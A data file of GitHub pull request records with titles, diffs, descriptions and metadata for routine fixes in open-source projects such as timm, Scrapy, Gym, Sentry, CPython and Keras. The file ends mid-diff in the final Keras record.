title (string, 2-169 chars) | diff (string, 235-19.5k chars) | body (string, 0-30.5k chars) | url (string, 48-84 chars) | created_at (string, 20 chars) | closed_at (string, 20 chars) | merged_at (string, 20 chars) | updated_at (string, 20 chars) | diff_len (float64, 101-3.99k) | repo_name (string, 83 classes) | __index_level_0__ (int64, 15-52.7k)
---|---|---|---|---|---|---|---|---|---|---|
Fix a few issues loading pretrained vit/bit npz weights... | diff --git a/README.md b/README.md
index 6b41d772d2..07c71a7664 100644
--- a/README.md
+++ b/README.md
@@ -23,6 +23,9 @@ I'm fortunate to be able to dedicate significant time and money of my own suppor
## What's New
+### June 23, 2021
+* Reproduce gMLP model training, `gmlp_s16_224` trained to 79.6 top-1, matching [paper](https://arxiv.org/abs/2105.08050).
+
### June 20, 2021
* Release Vision Transformer 'AugReg' weights from [How to train your ViT? Data, Augmentation, and Regularization in Vision Transformers](https://arxiv.org/abs/2106.10270)
* .npz weight loading support added, can load any of the 50K+ weights from the [AugReg series](https://console.cloud.google.com/storage/browser/vit_models/augreg)
diff --git a/tests/test_models.py b/tests/test_models.py
index 0a77078451..5c8b02dbe7 100644
--- a/tests/test_models.py
+++ b/tests/test_models.py
@@ -147,6 +147,15 @@ def test_model_default_cfgs(model_name, batch_size):
# FIXME mobilenetv3/ghostnet forward_features vs removed pooling differ
assert outputs.shape[-1] == pool_size[-1] and outputs.shape[-2] == pool_size[-2]
+ if 'pruned' not in model_name: # FIXME better pruned model handling
+ # test classifier + global pool deletion via __init__
+ model = create_model(model_name, pretrained=False, num_classes=0, global_pool='').eval()
+ outputs = model.forward(input_tensor)
+ assert len(outputs.shape) == 4
+ if not isinstance(model, timm.models.MobileNetV3) and not isinstance(model, timm.models.GhostNet):
+ # FIXME mobilenetv3/ghostnet forward_features vs removed pooling differ
+ assert outputs.shape[-1] == pool_size[-1] and outputs.shape[-2] == pool_size[-2]
+
# check classifier name matches default_cfg
classifier = cfg['classifier']
if not isinstance(classifier, (tuple, list)):
@@ -193,6 +202,13 @@ def test_model_default_cfgs_non_std(model_name, batch_size):
assert len(outputs.shape) == 2
assert outputs.shape[1] == model.num_features
+ model = create_model(model_name, pretrained=False, num_classes=0).eval()
+ outputs = model.forward(input_tensor)
+ if isinstance(outputs, tuple):
+ outputs = outputs[0]
+ assert len(outputs.shape) == 2
+ assert outputs.shape[1] == model.num_features
+
# check classifier name matches default_cfg
classifier = cfg['classifier']
if not isinstance(classifier, (tuple, list)):
@@ -217,6 +233,7 @@ def test_model_load_pretrained(model_name, batch_size):
"""Create that pretrained weights load, verify support for in_chans != 3 while doing so."""
in_chans = 3 if 'pruned' in model_name else 1 # pruning not currently supported with in_chans change
create_model(model_name, pretrained=True, in_chans=in_chans, num_classes=5)
+ create_model(model_name, pretrained=True, in_chans=in_chans, num_classes=0)
@pytest.mark.timeout(120)
@pytest.mark.parametrize('model_name', list_models(pretrained=True, exclude_filters=NON_STD_FILTERS))
diff --git a/timm/models/ghostnet.py b/timm/models/ghostnet.py
index a73047c5d8..3b6f90a42f 100644
--- a/timm/models/ghostnet.py
+++ b/timm/models/ghostnet.py
@@ -182,7 +182,7 @@ def __init__(self, cfgs, num_classes=1000, width=1.0, dropout=0.2, in_chans=3, o
self.conv_head = nn.Conv2d(prev_chs, out_chs, 1, 1, 0, bias=True)
self.act2 = nn.ReLU(inplace=True)
self.flatten = nn.Flatten(1) if global_pool else nn.Identity() # don't flatten if pooling disabled
- self.classifier = Linear(out_chs, num_classes)
+ self.classifier = Linear(out_chs, num_classes) if num_classes > 0 else nn.Identity()
def get_classifier(self):
return self.classifier
diff --git a/timm/models/levit.py b/timm/models/levit.py
index fa35f41f18..9987e4ba98 100644
--- a/timm/models/levit.py
+++ b/timm/models/levit.py
@@ -542,7 +542,7 @@ def checkpoint_filter_fn(state_dict, model):
state_dict = state_dict['model']
D = model.state_dict()
for k in state_dict.keys():
- if D[k].ndim == 4 and state_dict[k].ndim == 2:
+ if k in D and D[k].ndim == 4 and state_dict[k].ndim == 2:
state_dict[k] = state_dict[k][:, :, None, None]
return state_dict
diff --git a/timm/models/mlp_mixer.py b/timm/models/mlp_mixer.py
index 7a87eb36a0..f128b9c916 100644
--- a/timm/models/mlp_mixer.py
+++ b/timm/models/mlp_mixer.py
@@ -129,7 +129,9 @@ def _cfg(url='', **kwargs):
mean=IMAGENET_DEFAULT_MEAN, std=IMAGENET_DEFAULT_STD),
gmlp_ti16_224=_cfg(),
- gmlp_s16_224=_cfg(),
+ gmlp_s16_224=_cfg(
+ url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-weights/gmlp_s16_224_raa-10536d42.pth',
+ ),
gmlp_b16_224=_cfg(),
)
@@ -266,7 +268,7 @@ def __init__(
act_layer=act_layer, drop=drop_rate, drop_path=drop_path_rate)
for _ in range(num_blocks)])
self.norm = norm_layer(embed_dim)
- self.head = nn.Linear(embed_dim, self.num_classes) # zero init
+ self.head = nn.Linear(embed_dim, self.num_classes) if num_classes > 0 else nn.Identity()
self.init_weights(nlhb=nlhb)
diff --git a/timm/models/resnetv2.py b/timm/models/resnetv2.py
index a3c8953213..b96d77428f 100644
--- a/timm/models/resnetv2.py
+++ b/timm/models/resnetv2.py
@@ -424,7 +424,8 @@ def t2p(conv_weights):
model.stem.conv.weight.copy_(stem_conv_w)
model.norm.weight.copy_(t2p(weights[f'{prefix}group_norm/gamma']))
model.norm.bias.copy_(t2p(weights[f'{prefix}group_norm/beta']))
- if model.head.fc.weight.shape[0] == weights[f'{prefix}head/conv2d/kernel'].shape[-1]:
+ if isinstance(getattr(model.head, 'fc', None), nn.Conv2d) and \
+ model.head.fc.weight.shape[0] == weights[f'{prefix}head/conv2d/kernel'].shape[-1]:
model.head.fc.weight.copy_(t2p(weights[f'{prefix}head/conv2d/kernel']))
model.head.fc.bias.copy_(t2p(weights[f'{prefix}head/conv2d/bias']))
for i, (sname, stage) in enumerate(model.stages.named_children()):
diff --git a/timm/models/visformer.py b/timm/models/visformer.py
index 1663102735..7740f38132 100644
--- a/timm/models/visformer.py
+++ b/timm/models/visformer.py
@@ -237,7 +237,6 @@ def __init__(self, img_size=224, patch_size=16, in_chans=3, num_classes=1000, in
self.num_features = embed_dim if self.vit_stem else embed_dim * 2
self.norm = norm_layer(self.num_features)
self.global_pool, self.head = create_classifier(self.num_features, self.num_classes, pool_type=global_pool)
- self.head = nn.Linear(self.num_features, num_classes)
# weights init
if self.pos_embed:
diff --git a/timm/models/vision_transformer.py b/timm/models/vision_transformer.py
index 89fba7de69..9ec45868b2 100644
--- a/timm/models/vision_transformer.py
+++ b/timm/models/vision_transformer.py
@@ -6,7 +6,7 @@
- https://arxiv.org/abs/2010.11929
`How to train your ViT? Data, Augmentation, and Regularization in Vision Transformers`
- - https://arxiv.org/abs/2106.TODO
+ - https://arxiv.org/abs/2106.10270
The official jax code is released and available at https://github.com/google-research/vision_transformer
@@ -448,9 +448,12 @@ def _n2p(w, t=True):
model.pos_embed.copy_(pos_embed_w)
model.norm.weight.copy_(_n2p(w[f'{prefix}Transformer/encoder_norm/scale']))
model.norm.bias.copy_(_n2p(w[f'{prefix}Transformer/encoder_norm/bias']))
- if model.head.bias.shape[0] == w[f'{prefix}head/bias'].shape[-1]:
+ if isinstance(model.head, nn.Linear) and model.head.bias.shape[0] == w[f'{prefix}head/bias'].shape[-1]:
model.head.weight.copy_(_n2p(w[f'{prefix}head/kernel']))
model.head.bias.copy_(_n2p(w[f'{prefix}head/bias']))
+ if isinstance(getattr(model.pre_logits, 'fc', None), nn.Linear) and f'{prefix}pre_logits/bias' in w:
+ model.pre_logits.fc.weight.copy_(_n2p(w[f'{prefix}pre_logits/kernel']))
+ model.pre_logits.fc.bias.copy_(_n2p(w[f'{prefix}pre_logits/bias']))
for i, block in enumerate(model.blocks.children()):
block_prefix = f'{prefix}Transformer/encoderblock_{i}/'
mha_prefix = block_prefix + 'MultiHeadDotProductAttention_1/'
@@ -673,6 +676,7 @@ def vit_large_patch16_384(pretrained=False, **kwargs):
def vit_tiny_patch16_224_in21k(pretrained=False, **kwargs):
""" ViT-Tiny (Vit-Ti/16).
ImageNet-21k weights @ 224x224, source https://github.com/google-research/vision_transformer.
+ NOTE: this model has valid 21k classifier head and no representation (pre-logits) layer
"""
model_kwargs = dict(patch_size=16, embed_dim=192, depth=12, num_heads=3, **kwargs)
model = _create_vision_transformer('vit_tiny_patch16_224_in21k', pretrained=pretrained, **model_kwargs)
@@ -683,6 +687,7 @@ def vit_tiny_patch16_224_in21k(pretrained=False, **kwargs):
def vit_small_patch32_224_in21k(pretrained=False, **kwargs):
""" ViT-Small (ViT-S/16)
ImageNet-21k weights @ 224x224, source https://github.com/google-research/vision_transformer.
+ NOTE: this model has valid 21k classifier head and no representation (pre-logits) layer
"""
model_kwargs = dict(patch_size=32, embed_dim=384, depth=12, num_heads=6, **kwargs)
model = _create_vision_transformer('vit_small_patch32_224_in21k', pretrained=pretrained, **model_kwargs)
@@ -693,6 +698,7 @@ def vit_small_patch32_224_in21k(pretrained=False, **kwargs):
def vit_small_patch16_224_in21k(pretrained=False, **kwargs):
""" ViT-Small (ViT-S/16)
ImageNet-21k weights @ 224x224, source https://github.com/google-research/vision_transformer.
+ NOTE: this model has valid 21k classifier head and no representation (pre-logits) layer
"""
model_kwargs = dict(patch_size=16, embed_dim=384, depth=12, num_heads=6, **kwargs)
model = _create_vision_transformer('vit_small_patch16_224_in21k', pretrained=pretrained, **model_kwargs)
@@ -703,9 +709,10 @@ def vit_small_patch16_224_in21k(pretrained=False, **kwargs):
def vit_base_patch32_224_in21k(pretrained=False, **kwargs):
""" ViT-Base model (ViT-B/32) from original paper (https://arxiv.org/abs/2010.11929).
ImageNet-21k weights @ 224x224, source https://github.com/google-research/vision_transformer.
+ NOTE: this model has valid 21k classifier head and no representation (pre-logits) layer
"""
model_kwargs = dict(
- patch_size=32, embed_dim=768, depth=12, num_heads=12, representation_size=768, **kwargs)
+ patch_size=32, embed_dim=768, depth=12, num_heads=12, **kwargs)
model = _create_vision_transformer('vit_base_patch32_224_in21k', pretrained=pretrained, **model_kwargs)
return model
@@ -714,9 +721,10 @@ def vit_base_patch32_224_in21k(pretrained=False, **kwargs):
def vit_base_patch16_224_in21k(pretrained=False, **kwargs):
""" ViT-Base model (ViT-B/16) from original paper (https://arxiv.org/abs/2010.11929).
ImageNet-21k weights @ 224x224, source https://github.com/google-research/vision_transformer.
+ NOTE: this model has valid 21k classifier head and no representation (pre-logits) layer
"""
model_kwargs = dict(
- patch_size=16, embed_dim=768, depth=12, num_heads=12, representation_size=768, **kwargs)
+ patch_size=16, embed_dim=768, depth=12, num_heads=12, **kwargs)
model = _create_vision_transformer('vit_base_patch16_224_in21k', pretrained=pretrained, **model_kwargs)
return model
@@ -725,6 +733,7 @@ def vit_base_patch16_224_in21k(pretrained=False, **kwargs):
def vit_large_patch32_224_in21k(pretrained=False, **kwargs):
""" ViT-Large model (ViT-L/32) from original paper (https://arxiv.org/abs/2010.11929).
ImageNet-21k weights @ 224x224, source https://github.com/google-research/vision_transformer.
+ NOTE: this model has a representation layer but the 21k classifier head is zero'd out in original weights
"""
model_kwargs = dict(
patch_size=32, embed_dim=1024, depth=24, num_heads=16, representation_size=1024, **kwargs)
@@ -736,9 +745,10 @@ def vit_large_patch32_224_in21k(pretrained=False, **kwargs):
def vit_large_patch16_224_in21k(pretrained=False, **kwargs):
""" ViT-Large model (ViT-L/16) from original paper (https://arxiv.org/abs/2010.11929).
ImageNet-21k weights @ 224x224, source https://github.com/google-research/vision_transformer.
+ NOTE: this model has valid 21k classifier head and no representation (pre-logits) layer
"""
model_kwargs = dict(
- patch_size=16, embed_dim=1024, depth=24, num_heads=16, representation_size=1024, **kwargs)
+ patch_size=16, embed_dim=1024, depth=24, num_heads=16, **kwargs)
model = _create_vision_transformer('vit_large_patch16_224_in21k', pretrained=pretrained, **model_kwargs)
return model
@@ -747,7 +757,7 @@ def vit_large_patch16_224_in21k(pretrained=False, **kwargs):
def vit_huge_patch14_224_in21k(pretrained=False, **kwargs):
""" ViT-Huge model (ViT-H/14) from original paper (https://arxiv.org/abs/2010.11929).
ImageNet-21k weights @ 224x224, source https://github.com/google-research/vision_transformer.
- NOTE: converted weights not currently available, too large for github release hosting.
+ NOTE: this model has a representation layer but the 21k classifier head is zero'd out in original weights
"""
model_kwargs = dict(
patch_size=14, embed_dim=1280, depth=32, num_heads=16, representation_size=1280, **kwargs)
 | w/ num_classes=0 __init__ arg. Missed a few other small classifier handling details on Mlp, GhostNet, Levit. Should fix #713 | https://api.github.com/repos/huggingface/pytorch-image-models/pulls/714 | 2021-06-23T06:18:02Z | 2021-06-23T18:36:55Z | 2021-06-23T18:36:55Z | 2021-06-23T18:36:55Z | 3,900 | huggingface/pytorch-image-models | 16,412
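
The new tests in this record exercise the `num_classes=0` / `global_pool=''` path; a minimal sketch of the behaviour they check, assuming a recent `timm` install (the `resnet18` model name is only an illustrative choice, not tied to this PR):

```python
# Sketch of the classifier-free usage the added tests cover (assumes timm is installed).
import torch
import timm

x = torch.randn(2, 3, 224, 224)

# num_classes=0 with global_pool='' should yield an unpooled 4D feature map.
model = timm.create_model('resnet18', pretrained=False, num_classes=0, global_pool='').eval()
features = model(x)
print(features.shape)  # e.g. torch.Size([2, 512, 7, 7])

# num_classes=0 alone should yield pooled features of width model.num_features.
model = timm.create_model('resnet18', pretrained=False, num_classes=0).eval()
pooled = model(x)
print(pooled.shape)  # e.g. torch.Size([2, 512])
```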
[MRG+1] Added from_crawler to middleware docs | diff --git a/docs/topics/downloader-middleware.rst b/docs/topics/downloader-middleware.rst
index 0d168017f28..983a932904d 100644
--- a/docs/topics/downloader-middleware.rst
+++ b/docs/topics/downloader-middleware.rst
@@ -157,6 +157,17 @@ more of the following methods:
:param spider: the spider for which this request is intended
:type spider: :class:`~scrapy.spiders.Spider` object
+ .. method:: from_crawler(cls, crawler)
+
+ If present, this classmethod is called to create a middleware instance
+ from a :class:`~scrapy.crawler.Crawler`. It must return a new instance
+ of the middleware. Crawler object provides access to all Scrapy core
+ components like settings and signals; it is a way for middleware to
+ access them and hook its functionality into Scrapy.
+
+ :param crawler: crawler that uses this middleware
+ :type crawler: :class:`~scrapy.crawler.Crawler` object
+
.. _topics-downloader-middleware-ref:
Built-in downloader middleware reference
diff --git a/docs/topics/spider-middleware.rst b/docs/topics/spider-middleware.rst
index a2d2556c561..c297ed556ff 100644
--- a/docs/topics/spider-middleware.rst
+++ b/docs/topics/spider-middleware.rst
@@ -164,6 +164,17 @@ following methods:
:param spider: the spider to whom the start requests belong
:type spider: :class:`~scrapy.spiders.Spider` object
+ .. method:: from_crawler(cls, crawler)
+
+ If present, this classmethod is called to create a middleware instance
+ from a :class:`~scrapy.crawler.Crawler`. It must return a new instance
+ of the middleware. Crawler object provides access to all Scrapy core
+ components like settings and signals; it is a way for middleware to
+ access them and hook its functionality into Scrapy.
+
+ :param crawler: crawler that uses this middleware
+ :type crawler: :class:`~scrapy.crawler.Crawler` object
+
.. _Exception: https://docs.python.org/2/library/exceptions.html#exceptions.Exception
| Fixing issue #3019 by adding the `from_crawler` classmethod to the documentation of middlewares to make this feature more visible. | https://api.github.com/repos/scrapy/scrapy/pulls/3020 | 2017-11-23T14:29:05Z | 2017-11-24T14:56:58Z | 2017-11-24T14:56:58Z | 2017-12-22T00:23:07Z | 510 | scrapy/scrapy | 34,891 |
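
As a rough illustration of the hook being documented here, a downloader middleware might use `from_crawler` like this (the settings key, header name, and class are made up for the example, not part of the patch):

```python
# Illustrative Scrapy downloader middleware using the documented from_crawler hook.
# STATS_HEADER_VALUE and the header name are hypothetical, not part of the patch.
from scrapy import signals


class DemoHeaderMiddleware:
    def __init__(self, header_value):
        self.header_value = header_value

    @classmethod
    def from_crawler(cls, crawler):
        # The crawler exposes settings and signals; return a new middleware instance.
        mw = cls(header_value=crawler.settings.get('STATS_HEADER_VALUE', 'demo'))
        crawler.signals.connect(mw.spider_opened, signal=signals.spider_opened)
        return mw

    def spider_opened(self, spider):
        spider.logger.info('DemoHeaderMiddleware enabled')

    def process_request(self, request, spider):
        request.headers.setdefault('X-Demo-Header', self.header_value)
```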
Travis CI PyPy 3 issue checking | diff --git a/.travis.yml b/.travis.yml
index fec820cf6b8..58e78e6692f 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -24,6 +24,14 @@ matrix:
- env: TOXENV=docs
python: 3.6
install:
+ # For some reason the same PyPy3 version straight from Travis CI causes a
+ # test failure, so we install it manually here
+ - |
+ export PYPY_VERSION="pypy3.6-7.1.1-beta-linux_x86_64-portable"
+ wget "https://bitbucket.org/squeaky/portable-pypy/downloads/${PYPY_VERSION}.tar.bz2"
+ tar -jxf ${PYPY_VERSION}.tar.bz2
+ virtualenv --python="$PYPY_VERSION/bin/pypy3" "$HOME/virtualenvs/$PYPY_VERSION"
+ source "$HOME/virtualenvs/$PYPY_VERSION/bin/activate"
- pip install -U tox twine wheel codecov
script: tox
| https://api.github.com/repos/scrapy/scrapy/pulls/4129 | 2019-11-05T17:40:41Z | 2019-11-05T18:34:21Z | 2019-11-05T18:34:21Z | 2019-11-05T18:34:22Z | 250 | scrapy/scrapy | 34,705 |
|
Update setup.py | diff --git a/setup.py b/setup.py
index d2d708ceaf7..835cb60cb37 100644
--- a/setup.py
+++ b/setup.py
@@ -32,7 +32,7 @@
zip_safe=False,
install_requires=[
'scipy', 'numpy>=1.10.4', 'six', 'pyglet>=1.2.0,<=1.3.2', 'cloudpickle~=1.2.0',
- 'enum34~=1.1.6;python_version<"3.4"'
+ 'enum34~=1.1.6;python_version<"3.4"', 'opencv-python'
],
extras_require=extras,
package_data={'gym': [
| Just added opencv-python to be installed as a requirement. The new atari_preprocessing.py wrapper needs it. | https://api.github.com/repos/openai/gym/pulls/1713 | 2019-10-18T19:24:28Z | 2019-10-18T21:41:10Z | 2019-10-18T21:41:10Z | 2019-12-20T13:53:31Z | 161 | openai/gym | 5,614 |
ref(prism): Auto-download language dependencies | diff --git a/static/app/utils/loadPrismLanguage.ts b/static/app/utils/loadPrismLanguage.ts
index 1f2d0e74a950d..68958dc4dca78 100644
--- a/static/app/utils/loadPrismLanguage.ts
+++ b/static/app/utils/loadPrismLanguage.ts
@@ -40,7 +40,7 @@ export async function loadPrismLanguage(
}
) {
try {
- const language = prismLanguageMap[lang.toLowerCase()];
+ const language: string | undefined = prismLanguageMap[lang.toLowerCase()];
// If Prism doesn't have any grammar file available for the language
if (!language) {
@@ -54,7 +54,16 @@ export async function loadPrismLanguage(
return;
}
+ // Check for dependencies (e.g. `php` requires `markup-templating`) & download them
+ const deps: string[] | string | undefined =
+ prismComponents.languages[language].require;
+ (Array.isArray(deps) ? deps : [deps]).forEach(
+ async dep => dep && (await import(`prismjs/components/prism-${dep}.min`))
+ );
+
+ // Download language grammar file
await import(`prismjs/components/prism-${language}.min`);
+
onLoad?.();
} catch (error) {
// eslint-disable-next-line no-console
| Automatically detect and download Prism language dependencies (some languages will not load correctly without them, e.g. [`php` requires `markup-templating`](https://github.com/PrismJS/prism/issues/1400)).
**Before ——**
![image](https://user-images.githubusercontent.com/44172267/229880541-9436a9fd-520b-43f8-b284-08db9971ea1d.png)
![image](https://user-images.githubusercontent.com/44172267/229880582-6ab702ea-80c6-4ebc-ac4f-6637e7be5153.png)
**After ——**
![image](https://user-images.githubusercontent.com/44172267/229880475-aa604e16-1bef-4c78-9742-6c3fdf48536f.png)
| https://api.github.com/repos/getsentry/sentry/pulls/46887 | 2023-04-04T18:09:35Z | 2023-04-04T20:01:46Z | 2023-04-04T20:01:46Z | 2023-04-20T00:02:15Z | 301 | getsentry/sentry | 44,604 |
Fix: step by step API key generation | diff --git a/Troubleshooting.md b/Troubleshooting.md
index 3891db3a..89aa3ba7 100644
--- a/Troubleshooting.md
+++ b/Troubleshooting.md
@@ -11,7 +11,8 @@ You don't need a ChatGPT Pro account. Screenshot to code uses API keys from your
5. Go to Settings > Limits and check at the bottom of the page, your current tier has to be "Tier 1" to have GPT4 access
<img width="900" alt="285636973-da38bd4d-8a78-4904-8027-ca67d729b933" src="https://github.com/abi/screenshot-to-code/assets/23818/8d07cd84-0cf9-4f88-bc00-80eba492eadf">
-6. Go to Screenshot to code and paste it in the Settings dialog under OpenAI key (gear icon). Your key is only stored in your browser. Never stored on our servers.
+6. Navigate to OpenAI [api keys](https://platform.openai.com/api-keys) page and create and copy a new secret key.
+7. Go to Screenshot to code and paste it in the Settings dialog under OpenAI key (gear icon). Your key is only stored in your browser. Never stored on our servers.
## Still not working?
 | Fix the step-by-step guide by adding a reference to the specific page on which OpenAI API keys are generated | https://api.github.com/repos/abi/screenshot-to-code/pulls/304 | 2024-04-12T03:48:52Z | 2024-04-12T14:22:06Z | 2024-04-12T14:22:06Z | 2024-04-12T14:22:06Z | 305 | abi/screenshot-to-code | 46,891
[3.11] Docs: normalize SQL style in sqlite3 docs (GH-96403) | diff --git a/Doc/library/sqlite3.rst b/Doc/library/sqlite3.rst
index 50499b001e2805..21ad3540ccbb77 100644
--- a/Doc/library/sqlite3.rst
+++ b/Doc/library/sqlite3.rst
@@ -384,7 +384,7 @@ Module functions
... print(f"Error message: {unraisable.err_msg}")
>>> import sys
>>> sys.unraisablehook = debug
- >>> cur = con.execute("select 1")
+ >>> cur = con.execute("SELECT 1")
ZeroDivisionError('division by zero') in callback evil_trace
Error message: None
@@ -1206,7 +1206,7 @@ Cursor objects
("row2",),
]
# cur is an sqlite3.Cursor object
- cur.executemany("insert into data values(?)", rows)
+ cur.executemany("INSERT INTO data VALUES(?)", rows)
.. method:: executescript(sql_script, /)
@@ -1224,11 +1224,11 @@ Cursor objects
# cur is an sqlite3.Cursor object
cur.executescript("""
- begin;
- create table person(firstname, lastname, age);
- create table book(title, author, published);
- create table publisher(name, address);
- commit;
+ BEGIN;
+ CREATE TABLE person(firstname, lastname, age);
+ CREATE TABLE book(title, author, published);
+ CREATE TABLE publisher(name, address);
+ COMMIT;
""")
| (cherry picked from commit 6d403e264a7dcd1544a91708f139c6dd8612204d)
Co-authored-by: Erlend E. Aasland <erlend.aasland@protonmail.com> | https://api.github.com/repos/python/cpython/pulls/96404 | 2022-08-29T22:50:49Z | 2022-08-29T22:59:13Z | 2022-08-29T22:59:13Z | 2022-08-29T23:25:27Z | 349 | python/cpython | 4,661 |
Working version of ProbabilityDistributions scene, though I'm still u… | diff --git a/active_projects/eop/chapter1/prob_dist_visuals.py b/active_projects/eop/chapter1/prob_dist_visuals.py
index 513c94c204..b8b336c966 100644
--- a/active_projects/eop/chapter1/prob_dist_visuals.py
+++ b/active_projects/eop/chapter1/prob_dist_visuals.py
@@ -193,6 +193,7 @@ def construct(self):
# FadeIn(dice_unit_rect),
# FadeIn(dice_table.rows)
# )
+ # self.add(dice_unit_rect, dice_table_rows)
for (cell, label) in zip(dice_table.cells, dice_table.labels):
cell.add(label)
@@ -201,11 +202,10 @@ def construct(self):
# LaggedStart(FadeIn, dice_table_grouped_cells,
# lag_ratio = lag_ratio, run_time = run_time)
# )
- self.play(
- FadeIn(dice_table_grouped_cells),
- FadeIn(dice_unit_rect),
- FadeIn(dice_table.rows)
- )
+
+ self.remove(dice_table) # Remove the table
+ self.add(dice_table_grouped_cells) # Add in the reorganized version
+
self.wait(3)
@@ -226,6 +226,21 @@ def construct(self):
FadeOut(dice_table.rows),
FadeOut(dice_unit_rect),
)
+
+
+ # Animating the dice_table_group (which is what you had been
+ # manipulating above), instead of the dice_table, seems to work.
+ # I suspect there was something going on with the subgroup structures
+ # getting convoluted.
+ self.play(
+ dice_table_grouped_cells.scale, 0.5,
+ dice_table_grouped_cells.to_corner, UR,
+ )
+ # dice_table_target = dice_table.copy()
+ # dice_table_target.scale(0.5).to_corner(UR, buff = MED_LARGE_BUFF)
+
+ # self.play(Transform(dice_table, dice_table_target))
+
self.wait(3)
| …nsure what the underlying bug was | https://api.github.com/repos/3b1b/manim/pulls/234 | 2018-05-11T18:33:42Z | 2018-09-11T18:45:15Z | 2018-09-11T18:45:15Z | 2019-02-03T20:24:14Z | 473 | 3b1b/manim | 18,505 |
Fill keys in CSVLogger before stop_training is checked | diff --git a/keras/callbacks.py b/keras/callbacks.py
index d86c26ce0f2..55d640e2a84 100644
--- a/keras/callbacks.py
+++ b/keras/callbacks.py
@@ -965,13 +965,14 @@ def handle_value(k):
else:
return k
+ if self.keys is None:
+ self.keys = sorted(logs.keys())
+
if self.model.stop_training:
# We set NA so that csv parsers do not fail for this last epoch.
logs = dict([(k, logs[k]) if k in logs else (k, 'NA') for k in self.keys])
if not self.writer:
- self.keys = sorted(logs.keys())
-
class CustomDialect(csv.excel):
delimiter = self.sep
| Fixes #8797. | https://api.github.com/repos/keras-team/keras/pulls/8801 | 2017-12-15T12:15:50Z | 2017-12-15T19:00:20Z | 2017-12-15T19:00:20Z | 2017-12-15T19:00:20Z | 183 | keras-team/keras | 47,736 |
[RELNOTES] Add `target_tensors` to `compile`. | diff --git a/keras/engine/training.py b/keras/engine/training.py
index 80ade166499..3b517810e08 100644
--- a/keras/engine/training.py
+++ b/keras/engine/training.py
@@ -52,6 +52,10 @@ def _standardize_input_data(data, names, shapes=None,
ValueError: in case of improperly formatted user-provided data.
"""
if not names:
+ if data:
+ raise ValueError('Error when checking model ' +
+ exception_prefix + ': '
+ 'expected no data, but got:', data)
return []
if data is None:
return [None for _ in range(len(names))]
@@ -564,7 +568,8 @@ class Model(Container):
"""
def compile(self, optimizer, loss, metrics=None, loss_weights=None,
- sample_weight_mode=None, weighted_metrics=None, **kwargs):
+ sample_weight_mode=None, weighted_metrics=None,
+ target_tensors=None, **kwargs):
"""Configures the model for training.
# Arguments
@@ -597,6 +602,14 @@ def compile(self, optimizer, loss, metrics=None, loss_weights=None,
If the model has multiple outputs, you can use a different
`sample_weight_mode` on each output by passing a
dictionary or a list of modes.
+ target_tensors: by default, Keras will create placeholders for the
+ model's target, which will be fed with the target data during
+ training. If instead you would like to use your own
+ target tensors (in turn, Keras will not expect external
+ Numpy data for these targets at training time), you
+ can specify them via the `target_tensors` argument. It can be
+ a single tensor (for a single-output model), a list of tensors,
+ or a dict mapping output names to target tensors.
weighted_metrics: list of metrics to be evaluated and weighted
by sample_weight or class_weight during training and testing
**kwargs: when using the Theano/CNTK backends, these arguments
@@ -644,19 +657,16 @@ def compile(self, optimizer, loss, metrics=None, loss_weights=None,
loss_functions = [loss_function for _ in range(len(self.outputs))]
self.loss_functions = loss_functions
weighted_losses = [_weighted_masked_objective(fn) for fn in loss_functions]
- skip_indices = []
+ skip_target_indices = []
+ skip_target_weighing_indices = []
self._feed_outputs = []
self._feed_output_names = []
self._feed_output_shapes = []
self._feed_loss_fns = []
for i in range(len(weighted_losses)):
if weighted_losses[i] is None:
- skip_indices.append(i)
- else:
- self._feed_outputs.append(self.outputs[i])
- self._feed_output_names.append(self.output_names[i])
- self._feed_output_shapes.append(self.internal_output_shapes[i])
- self._feed_loss_fns.append(self.loss_functions[i])
+ skip_target_indices.append(i)
+ skip_target_weighing_indices.append(i)
# Prepare output masks.
masks = self.compute_mask(self.inputs, mask=None)
@@ -691,6 +701,56 @@ def compile(self, optimizer, loss, metrics=None, loss_weights=None,
str(loss_weights) +
' - expected a list of dicts.')
+ # Prepare targets of model.
+ self.targets = []
+ self._feed_targets = []
+ if target_tensors is not None:
+ if isinstance(target_tensors, list):
+ if len(target_tensors) != len(self.outputs):
+ raise ValueError(
+ 'When passing a list as `target_tensors`, '
+ 'it should have one entry per model outputs. '
+ 'The model has ' + str(len(self.outputs)) +
+ ' outputs, but you passed target_tensors=' +
+ str(target_tensors))
+ elif isinstance(target_tensors, dict):
+ for name in target_tensors:
+ if name not in self.output_names:
+ raise ValueError('Unknown entry in `target_tensors` '
+ 'dictionary: "' + name + '". '
+ 'Only expected the following keys: ' +
+ str(self.output_names))
+ _target_tensors = []
+ for name in self.output_names:
+ _target_tensors.append(target_tensors.get(name, None))
+ target_tensors = _target_tensors
+ else:
+ raise TypeError('Expected `target_tensors` to be '
+ 'a list or dict, but got:', target_tensors)
+ for i in range(len(self.outputs)):
+ if i in skip_target_indices:
+ self.targets.append(None)
+ else:
+ shape = self.internal_output_shapes[i]
+ name = self.output_names[i]
+ if target_tensors is not None:
+ target = target_tensors[i]
+ else:
+ target = None
+ if target is None:
+ target = K.placeholder(ndim=len(shape),
+ name=name + '_target',
+ sparse=K.is_sparse(self.outputs[i]),
+ dtype=K.dtype(self.outputs[i]))
+ self._feed_targets.append(target)
+ self._feed_outputs.append(self.outputs[i])
+ self._feed_output_names.append(name)
+ self._feed_output_shapes.append(shape)
+ self._feed_loss_fns.append(self.loss_functions[i])
+ else:
+ skip_target_weighing_indices.append(i)
+ self.targets.append(target)
+
# Prepare sample weights.
sample_weights = []
sample_weight_modes = []
@@ -703,7 +763,7 @@ def compile(self, optimizer, loss, metrics=None, loss_weights=None,
'Only expected the following keys: ' +
str(self.output_names))
for i, name in enumerate(self.output_names):
- if i in skip_indices:
+ if i in skip_target_weighing_indices:
weight = None
sample_weight_modes.append(None)
else:
@@ -729,7 +789,7 @@ def compile(self, optimizer, loss, metrics=None, loss_weights=None,
'sample_weight_mode=' +
str(sample_weight_mode))
for i in range(len(self.output_names)):
- if i in skip_indices:
+ if i in skip_target_weighing_indices:
weight = None
sample_weight_modes.append(None)
else:
@@ -746,7 +806,7 @@ def compile(self, optimizer, loss, metrics=None, loss_weights=None,
sample_weights.append(weight)
else:
for i, name in enumerate(self.output_names):
- if i in skip_indices:
+ if i in skip_target_weighing_indices:
sample_weight_modes.append(None)
sample_weights.append(None)
else:
@@ -763,25 +823,9 @@ def compile(self, optimizer, loss, metrics=None, loss_weights=None,
self.sample_weight_modes = sample_weight_modes
